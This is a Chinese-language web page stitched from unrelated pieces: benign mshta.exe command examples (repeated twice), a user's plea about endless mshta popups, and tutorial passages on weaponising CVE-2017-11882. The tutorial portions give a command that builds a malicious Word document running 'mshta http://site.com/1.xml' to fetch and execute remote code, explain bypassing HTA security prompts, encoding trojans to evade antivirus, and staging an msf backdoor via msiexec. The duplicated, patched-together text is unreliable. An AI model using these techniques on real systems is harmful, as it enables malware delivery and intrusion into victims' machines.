mshta mshta.exe彈出窗口怎么辦

mshta命令用法示例,mshta命令示例


它支持命令行參數,可以接收JS和VBS的方法??词纠ㄔ诿钚邢聹y試):

JS:

復制代碼 代碼如下:

mshta vbscript:window.execScript("alert('hello world!');","javascript")



VBS:

復制代碼 代碼如下:

mshta javascript:window.execScript("msgBox('hello world!'):window.close","vbs")



調用VBS,分別使用MSGBOX函數和POPUP方法:

復制代碼 代碼如下:

mshta vbscript:msgbox("該干活了,伙計!",64,"提示")(window.close)
mshta vbscript:CreateObject("Wscript.Shell").popup("該干活了,伙計!",7,"提示",64)(window.close)


execute方法 一條語句連續彈二個信息框:

復制代碼 代碼如下:

mshta vbscript:execute("msgbox ""one BOX"":msgbox ""two BOX"":window.close")


LZ他們弄的,調用系統的英文閱讀:

復制代碼 代碼如下:

mshta vbscript:createobject("sapi.spvoice").speak("Good luck")(window.close)、
如圖所示,一直彈出這個窗口,右鍵任務管理器里面看到:Microsoft(R)html應用程序主機,好像是之前點了個什么hta的文件用windows media player打開了,然后就一直彈出這個窗口,各種殺毒什么的都不行,windows修復助手也不行,求助各位大神啊。電腦系統為最新win8.1.在線等啊。
求助啊,一直在彈出,關鍵是現在不想重新裝系統啊,系統里面東西很多,軟件很多,重裝很麻煩,希望能不能通過恢復之類的可以解決,這樣就不用重裝系統了。

Evi1cg同學前不久放出CVE-2017-11882的一個 python利用腳本,地址在https://github.com/Ridter/CVE-2017-11882/,不過其中一個版本里邊有一個限制,執行命令只能用43個字節。如果要用43個字節來完成一個文件的下載執行,在我所掌握的命令行知識里,除了mshta命令,其它的好像都做不到。所以在這里我就淺談一下如何構造這個mshta命令,另外提一下hta文件在安全方面的一個應用。

mshta.exe是微軟Windows操作系統相關程序,用于執行.HTA文件。HTA是HTML Application的縮寫(HTML應用程序),是軟件開發的新概念,直接將HTML保存成HTA的格式,就是一個獨立的應用軟件,與VB、C++等程序語言所設計的軟件界面沒什么差別。mshta執行.hta文件,是以當前用戶權限執行,hta文件可以隨便改后綴,也可以本地或遠程執行,本地執行的時候,要記得帶全路徑名,否則會出錯。另外,mshta支持各種協議,甚至支持mk:@MSITStore協議或是ms-its協議。

一、HTA文件 內嵌的html文件如何去除本地安全認證呢?

我們知道,html文件打開的宿主如果是IE,html文件里調用的是像W.Shell此類組件的話,IE會彈一個框,限制運行腳本或Active控件。我們來驗證一下,寫代碼1.htm如下:

如果我們用HTA文件來iframe這個1.htm,hta是本地用戶權限,應當可以繞過此限制,如何繞呢?我們就要用到 iframe的一個參數了application=”yes”了。這樣就不會彈阻止框了,可以干壞事了,1.hta代碼如下:

Sample HTML Application one <!--這里是去掉驗證的關鍵-->

二、如何寫一個高效的下載執行過殺軟的hta文件?

如果是下載執行的話,哪就很弱了。hta文件里可以自由地寫vb代碼,所以我們的思路是可以把你的木馬轉換成base64格式也好,轉換成16進制也好再轉回來,hta只是訪問了一個網頁而已,但是已經把木馬轉到本地了,具體代碼1.hta可以如下:

然后,你可以把這個1.hta改名1.xml之類的文件放在遠程空間了,直接mshta http://www.site.xom/1.xml,就可以了。如果是利用CVE-2017-11882.py,哪么直接執行下邊命令就生成了,其中http://site.com/1.xml你可以換成短網址。

python27 Command_CVE-2017-11882.py -c "mshta http://site.com/1.xml" -o test.doc

下圖是我做的測試圖。

它支持命令行參數,可以接收JS和VBS的方法??词纠ㄔ诿钚邢聹y試):

JS:

代碼如下:


mshta vbscript:window.execScript(“alert(‘hello world!’);”,”javascript”)

VBS:

代碼如下:


mshta javascript:window.execScript(“msgBox(‘hello world!’):window.close”,”vbs”)

調用VBS,分別使用MSGBOX函數和POPUP方法:

代碼如下:


mshta vbscript:msgbox(“該干活了,伙計!”,64,”提示”)(window.close)
mshta vbscript:CreateObject(“Wscript.Shell”).popup(“該干活了,伙計!”,7,”提示”,64)(window.close)

execute方法 一條語句連續彈二個信息框:

代碼如下:


mshta vbscript:execute(“msgbox “”one BOX””:msgbox “”two BOX””:window.close”)

LZ他們弄的,調用系統的英文閱讀:

代碼如下:


mshta vbscript:createobject(“sapi.spvoice”).speak(“Good luck”)(window.close)

漏洞位于EQNEDT32.EXE組件中,該組件于2001年編譯嵌入office,之后沒有任何進一步的修改。攻擊者可以利用漏洞以當前登錄的用戶身份執行任意命令。接下來,ISEC實驗室的老師,將對此漏洞利用過程進行復現,小伙伴們,快上車啦!

一、CVE-2017-11882復現

實驗環境:

?攻擊機器操作系統:kali 2.0

?攻擊機器ip:192.168.1.106

?受害者操作系統:win7 x64

?受害者ip:192.168.1.6

?offcie版本:office_professional_plus_2013_with_sp1_x64

1、首先在kali下使用msf生成后門文件,類型為msi格式,如下圖:

2、將該后門p.exe放到web目錄下,同時在web目錄下新建hta文件,通過調用W.Shell執行msiexec去運行遠程的p.exe,即上一步生成的后門文件,注意msiexec只能執行msi文件,因此在上一步生成的文件類型一定要是msi類型的,至于后綴名無所謂,hta文件如下圖:

3、到https://github.com/Ridter/CVE-2017-11882/下載漏洞利用程序,執行如下命令生成惡意doc文件,這里由于命令長度不能超過43 bytes,因此使用mshta命令去調用遠程的hta文件來執行更復雜的操作,如下圖:

4、在msf中使用exploit/multi/handler模塊,并設置相應payload參數開啟監聽,如下圖:

更多
  • 該日志由 于2017年12月16日發表在 未分類 分類下, 你可以發表評論,并在保留原文地址 及作者的情況下引用到你的網站或博客。
  • 本文鏈接: mshta mshta.exe彈出窗口怎么辦 | 幫助信息-動天數據
  • 版權所有: 幫助信息-動天數據-轉載請標明出處
  • 【上一篇】 【下一篇】

    0 Comments.